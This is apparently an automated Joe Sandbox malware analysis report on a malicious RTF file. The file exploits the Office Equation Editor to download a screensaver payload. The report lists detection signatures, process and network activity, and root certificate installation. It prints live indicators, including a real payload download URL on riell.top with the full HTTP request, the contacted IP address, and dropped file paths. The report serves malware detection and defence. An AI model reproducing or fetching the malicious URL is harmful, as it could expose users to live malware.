Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xJvN1QBl91.rtf

Overview

General Information

Sample name:xJvN1QBl91.rtf
renamed because original name is a hash value
Original sample name:de3ba4db4f0cf4d3b92ad9429de7545e.rtf
Analysis ID:1467965
MD5:de3ba4db4f0cf4d3b92ad9429de7545e
SHA1:5b6eb61b2905c89698e5468a9a3dc468680b2d8e
SHA256:fbd4bb68ae72c7715dcf61c915bdbc48d4d60eb9cd6bae30d74aad3e796663c7
Tags:rtf
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected BlockedWebSite
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3064 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 1272 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • EQNEDT32.EXE (PID: 3252 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
xJvN1QBl91.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x16f42:$obj2: \objdata
  • 0x16f5b:$obj3: \objupdate
  • 0x16f1d:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\white72911.scrJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\white[1].htmJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 188.114.96.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1272, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
      Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1272, TargetFilename: C:\Users\user\AppData\Roaming\white72911.scr
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1272, TargetFilename: C:\Users\user\AppData\Roaming\white72911.scr
      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1272, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3064, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
      No Snort rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://riell.top/white.scrAvira URL Cloud: Label: malware
      Source: riell.topVirustotal: Detection: 12%Perma Link
      Source: https://riell.top/white.scrVirustotal: Detection: 7%Perma Link
      Source: xJvN1QBl91.rtfReversingLabs: Detection: 48%
      Source: xJvN1QBl91.rtfVirustotal: Detection: 47%Perma Link

      Exploits

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 188.114.96.3 Port: 443Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: unknownJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

      Phishing

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\white72911.scr, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\white[1].htm, type: DROPPED
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Source: global trafficDNS query: name: riell.top
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
      Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global trafficHTTP traffic detected: GET /white.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{946CCB1C-A640-4FD8-834D-6A235994F9AB}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /white.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: riell.topConnection: Keep-Alive
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global trafficDNS traffic detected: DNS query: riell.top
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.use
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/:
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/a
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/white.scr
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/white.scrj
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://riell.top/white.scrjjC:
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, white[1].htm.2.dr, white72911.scr.2.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
      Source: EQNEDT32.EXE, 00000002.00000002.346288953.0000000000920000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.346288953.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, white[1].htm.2.dr, white72911.scr.2.drString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.2

      System Summary

      barindex
      Source: xJvN1QBl91.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E424C2_2_008E424C
      Source: xJvN1QBl91.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
      Source: classification engineClassification label: mal100.phis.expl.winRTF@4/11@1/1
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$vN1QBl91.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6853.tmpJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: xJvN1QBl91.rtfReversingLabs: Detection: 48%
      Source: xJvN1QBl91.rtfVirustotal: Detection: 47%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: xJvN1QBl91.LNK.0.drLNK file: ..\..\..\..\..\Desktop\xJvN1QBl91.rtf
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6A8E push esp; ret 2_2_008F6A8F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6888 push dword ptr [esp+ebx*8+53h]; ret 2_2_008F68A3
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6A84 push esp; ret 2_2_008F6A87
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6A96 push esp; ret 2_2_008F6A97
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F68A8 push ebx; ret 2_2_008F68AB
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F68B0 push ebx; ret 2_2_008F68B3
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F64DF push esi; ret 2_2_008F64E3
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F64D8 push esi; ret 2_2_008F64DB
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F64E7 push esi; ret 2_2_008F64EB
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6A4C push esp; ret 2_2_008F6A4F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6A46 push esp; ret 2_2_008F6A47
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6C6F push esi; ret 2_2_008F6C73
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F686A push ebx; ret 2_2_008F686B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6C68 push esi; ret 2_2_008F6C6B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F8C7B push ebp; ret 2_2_008F8C7F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008F6C77 push esi; ret 2_2_008F6C7B
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E01F4 push eax; retf 2_2_008E01F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008EC3F0 push A0008EC4h; ret 2_2_008EC3F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_008E8F60 push eax; retf 2_2_008E8F61

      Persistence and Installation Behavior

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
